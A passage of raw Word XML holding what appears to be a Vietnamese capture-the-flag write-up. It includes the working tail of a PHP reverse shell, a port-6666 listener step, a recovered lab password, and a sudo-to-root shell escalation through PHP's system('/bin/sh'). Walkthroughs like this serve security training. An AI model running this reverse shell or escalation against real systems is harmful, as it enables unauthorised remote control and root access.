      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if (feof($pipes[1])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2C54AB" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>printit("ERROR: Shell process terminated");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB8F1E6" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6824CCDC" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D3F8A0" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CF5F0C2" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>$read_a = array($sock, $pipes[1], $pipes[2]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32222C20" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6403A5F5" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B029C24" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if (in_array($sock, $read_a)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2CFFC0" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if ($debug) printit("SOCK READ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5C272B" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$input = fread($sock, $chunk_size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D575BDC" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if ($debug) printit("SOCK: $input");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6BEC72" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fwrite($pipes[0], $input);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765AD655" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DD8413" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E2096DB" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if (in_array($pipes[1], $read_a)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7348341C" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if ($debug) printit("STDOUT READ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34040D62" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$input = fread($pipes[1], $chunk_size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A824225" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if ($debug) printit("STDOUT: $input");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12303B3E" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fwrite($sock, $input);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5D7D08" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20928F00" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3184A67A" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if (in_array($pipes[2], $read_a)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F367FE" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if ($debug) printit("STDERR READ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE954AA" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$input = fread($pipes[2], $chunk_size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E61CBFB" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if ($debug) printit("STDERR: $input");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DB4E4C" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fwrite($sock, $input);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4057ABF3" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6C6A28" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20317B6A" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25586727" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>fclose($sock);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7A0E3F" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>fclose($pipes[0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248160E1" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>fclose($pipes[1]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126E50FD" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>fclose($pipes[2]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D25A4B2" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>proc_close($process);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182C0FA4" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D60CB49" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>function printit ($string) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35639F04" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if (!$daemon) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D81AB8" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>print "$string\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0285DC84" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646954FF" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EE9873" w14:textId="77777777" w:rsidR="00193F20" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A13E1E3" w14:textId="62529AFC" w:rsidR="00761000" w:rsidRDefault="00193F20" w:rsidP="00A72563">
      <w:pPr>
        <w:spacing w:after="0" w:line="40" w:lineRule="atLeast"/>
      </w:pPr>
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16109635" w14:textId="10E13B6D" w:rsidR="00A72563" w:rsidRDefault="00A72563" w:rsidP="00A72563"/>
    <w:p w14:paraId="2BB16DF6" w14:textId="15506F0F" w:rsidR="005F73A5" w:rsidRDefault="005F73A5" w:rsidP="00A72563">
      <w:r>
        <w:t>Mở một cổng nghe 6666 ta nhận được shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C1591B" w14:textId="53214CF0" w:rsidR="005F73A5" w:rsidRDefault="005F73A5" w:rsidP="00A72563">
      <w:r w:rsidRPr="005F73A5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07FC2DE6" wp14:editId="4B772A43">
            <wp:extent cx="5731510" cy="14681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468120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F917558" w14:textId="58773914" w:rsidR="00C91FE6" w:rsidRDefault="00C91FE6" w:rsidP="00A72563">
      <w:r>
        <w:t>Flag đầu tiên nằm tại user saket chứ không phải user victor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D59CCA" w14:textId="378A81E6" w:rsidR="00C91FE6" w:rsidRDefault="00C91FE6" w:rsidP="00A72563">
      <w:r w:rsidRPr="00C91FE6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F95A6F6" wp14:editId="3B330595">
            <wp:extent cx="4145639" cy="2522439"/>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5639" cy="2522439"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A61B23" w14:textId="2EDAB065" w:rsidR="007150F9" w:rsidRDefault="00AB7B3B" w:rsidP="00A72563">
      <w:r>
        <w:t>Thử check quyền sudo với user saket, ta nhận được kết quả</w:t>
      </w:r>
      <w:r w:rsidR="001E1F0B">
        <w:t xml:space="preserve"> khá khả quan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393A3D46" w14:textId="43C77614" w:rsidR="007150F9" w:rsidRDefault="007150F9" w:rsidP="00A72563">
      <w:r w:rsidRPr="007150F9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40429C15" wp14:editId="79BFF7C3">
            <wp:extent cx="5731510" cy="80327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803275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5609C737" w14:textId="3FD6D3C2" w:rsidR="00A12D29" w:rsidRDefault="00A12D29" w:rsidP="00A72563">
      <w:r>
        <w:t>Có thể file /enc sẽ làm được gì đó, nhưng trước hết file này không thể xem được nội dung, và khi thực thi cần một password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F869F75" w14:textId="0ED2DA64" w:rsidR="00A12D29" w:rsidRDefault="00850970" w:rsidP="00A72563">
      <w:r w:rsidRPr="00850970">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B18BF88" wp14:editId="1F788FA3">
            <wp:extent cx="2385267" cy="815411"/>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85267" cy="815411"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A10E6E6" w14:textId="1BD6B2B0" w:rsidR="00AC6A02" w:rsidRDefault="00AC6A02" w:rsidP="00A72563">
      <w:r>
        <w:t>Sau một hồi lục lọi, tìm kiếm, mật khẩu của file này được cất trong folder /opt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1691BA6B" w14:textId="3AD22B0F" w:rsidR="00AC6A02" w:rsidRDefault="00AC6A02" w:rsidP="00A72563">
      <w:r w:rsidRPr="00AC6A02">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F871920" wp14:editId="6CDB9E83">
            <wp:extent cx="3962743" cy="289585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2743" cy="2895851"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCAA09D" w14:textId="57FE5ED8" w:rsidR="00905A41" w:rsidRDefault="00905A41" w:rsidP="00A72563">
      <w:r>
        <w:t>Sau khi chạy thành công, sẽ có 2 file được copy từ thư mục /root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E16D6EB" w14:textId="729C32EB" w:rsidR="003F0A89" w:rsidRDefault="00905A41" w:rsidP="00A72563">
      <w:r w:rsidRPr="00905A41">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="702D962F" wp14:editId="1FE77F9D">
            <wp:extent cx="1394581" cy="10135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94581" cy="1013548"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6502B085" w14:textId="6D5A65FE" w:rsidR="003F0A89" w:rsidRDefault="003F0A89" w:rsidP="00A72563">
      <w:r w:rsidRPr="003F0A89">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39999056" wp14:editId="3A127EEE">
            <wp:extent cx="5731510" cy="949325"/>
            <wp:effectExtent l="0" t="0" r="254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949325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4007AE98" w14:textId="29CF7A1F" w:rsidR="003F0A89" w:rsidRDefault="003F0A89" w:rsidP="00A72563">
      <w:r>
        <w:t>Có lẽ enc.txt bị mã hoá AES với key là MD5 hash của ippsec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178CB6F4" w14:textId="5D93937F" w:rsidR="003F0A89" w:rsidRDefault="003F0A89" w:rsidP="00A72563">
      <w:r>
        <w:t>Thật vậy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34592B87" w14:textId="018E575E" w:rsidR="00905A41" w:rsidRDefault="00905A41" w:rsidP="00A72563">
      <w:r w:rsidRPr="00905A41">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FD7FB58" wp14:editId="3BD21B5D">
            <wp:extent cx="5486875" cy="68204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875" cy="6820491"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBA57A9" w14:textId="4D46F2DB" w:rsidR="003F0A89" w:rsidRDefault="003F0A89" w:rsidP="00A72563">
      <w:r>
        <w:t>Đoạn text ta nhận được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DFA223" w14:textId="5EB73971" w:rsidR="003F0A89" w:rsidRDefault="003F0A89" w:rsidP="00A72563">
      <w:r w:rsidRPr="003F0A89">
        <w:t>Dont worry saket one day we will reach toour destination very soon. And if you forget your username then use your old password==&gt; "tribute_to_ippsec"Victor,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36239844" w14:textId="08B30226" w:rsidR="000471C5" w:rsidRDefault="000471C5" w:rsidP="00A72563">
      <w:r>
        <w:t>Vậy là ta đã có được passowrd của user saket, thử ssh xem chúng ta có gì:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56662EB7" w14:textId="0CBBD4C8" w:rsidR="000471C5" w:rsidRDefault="004A36F0" w:rsidP="00A72563">
      <w:r w:rsidRPr="004A36F0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08F0FA0C" wp14:editId="1C20C58E">
            <wp:extent cx="5731510" cy="1137285"/>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137285"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDEAC03" w14:textId="5EA90BB4" w:rsidR="00376BC8" w:rsidRDefault="00376BC8" w:rsidP="00A72563">
      <w:r>
        <w:t>Có vẻ như chúng ta lần nào có thể lên root, user saket có thể thực thi file undefeted_victor từ /home/victor mà không cần mật khẩu, khi chạy thử</w:t>
      </w:r>
      <w:r w:rsidR="00774C99">
        <w:t>, nhận được lỗi không có tệp /tmp/challenge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1632DA2D" w14:textId="2F64D309" w:rsidR="00774C99" w:rsidRDefault="00774C99" w:rsidP="00A72563">
      <w:r w:rsidRPr="00774C99">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="735A33B0" wp14:editId="45B79891">
            <wp:extent cx="5731510" cy="4406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40690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A00CA60" w14:textId="23CA28F5" w:rsidR="00774C99" w:rsidRDefault="00774C99" w:rsidP="00A72563">
      <w:r>
        <w:t>Vậy không có thì ta tạo thôi, trước tên tạo thử tệp với nội dung echo test;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D920344" w14:textId="53E4375A" w:rsidR="00637783" w:rsidRDefault="00637783" w:rsidP="00A72563">
      <w:r w:rsidRPr="00637783">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57D78498" wp14:editId="0206A492">
            <wp:extent cx="1554615" cy="365792"/>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54615" cy="365792"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="752C4805" w14:textId="53183FFB" w:rsidR="00637783" w:rsidRDefault="00637783" w:rsidP="00A72563">
      <w:r>
        <w:t>Sau đó cấp quyền cho file và chạy thử:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D08352A" w14:textId="79666EE6" w:rsidR="00637783" w:rsidRDefault="00637783" w:rsidP="00A72563">
      <w:r w:rsidRPr="00637783">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12C179AA" wp14:editId="23651F17">
            <wp:extent cx="4237087" cy="662997"/>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37087" cy="662997"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B95A93" w14:textId="64F82687" w:rsidR="00637783" w:rsidRDefault="00637783" w:rsidP="00A72563">
      <w:r>
        <w:t xml:space="preserve">Tuyệt vời, với </w:t>
      </w:r>
      <w:r w:rsidR="005F613A">
        <w:t>file này của user victor, ta có thể thực thi 1 file php tuỳ ý, vậy thì chúng ta đã có thể lên root với 2 câu lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D0F2A6" w14:textId="77777777" w:rsidR="005F613A" w:rsidRDefault="005F613A" w:rsidP="005F613A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CMD="/bin/sh"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEAF564" w14:textId="4EC3155E" w:rsidR="005F613A" w:rsidRDefault="005F613A" w:rsidP="005F613A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo php -r "system('$CMD');"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1784DA" w14:textId="10B8F642" w:rsidR="005F613A" w:rsidRDefault="005F613A" w:rsidP="005F613A"/>
    <w:p w14:paraId="22CC03B1" w14:textId="6068EB11" w:rsidR="001E1B64" w:rsidRDefault="001E1B64" w:rsidP="005F613A">
      <w:r>
        <w:t>Chạy lại lần nữa nào :))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EF3276" w14:textId="12AB83BA" w:rsidR="001E1B64" w:rsidRPr="005F613A" w:rsidRDefault="001E1B64" w:rsidP="005F613A">
      <w:r w:rsidRPr="001E1B64">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58E93BE1" wp14:editId="17A2B052">
            <wp:extent cx="5731510" cy="3100705"/>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100705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78942A3A" w14:textId="7DB994D9" w:rsidR="005F613A" w:rsidRDefault="00E752CA" w:rsidP="005F613A">
      <w:r>
        <w:t>Done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53903D32" w14:textId="44EE1213" w:rsidR="00E752CA" w:rsidRDefault="00E752CA" w:rsidP="005F613A">
      <w:r w:rsidRPr="00E752CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76432406" wp14:editId="08C9E8A1">
            <wp:extent cx="3048264" cy="243861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48264" cy="2438611"/>
                    </a:xfrm>
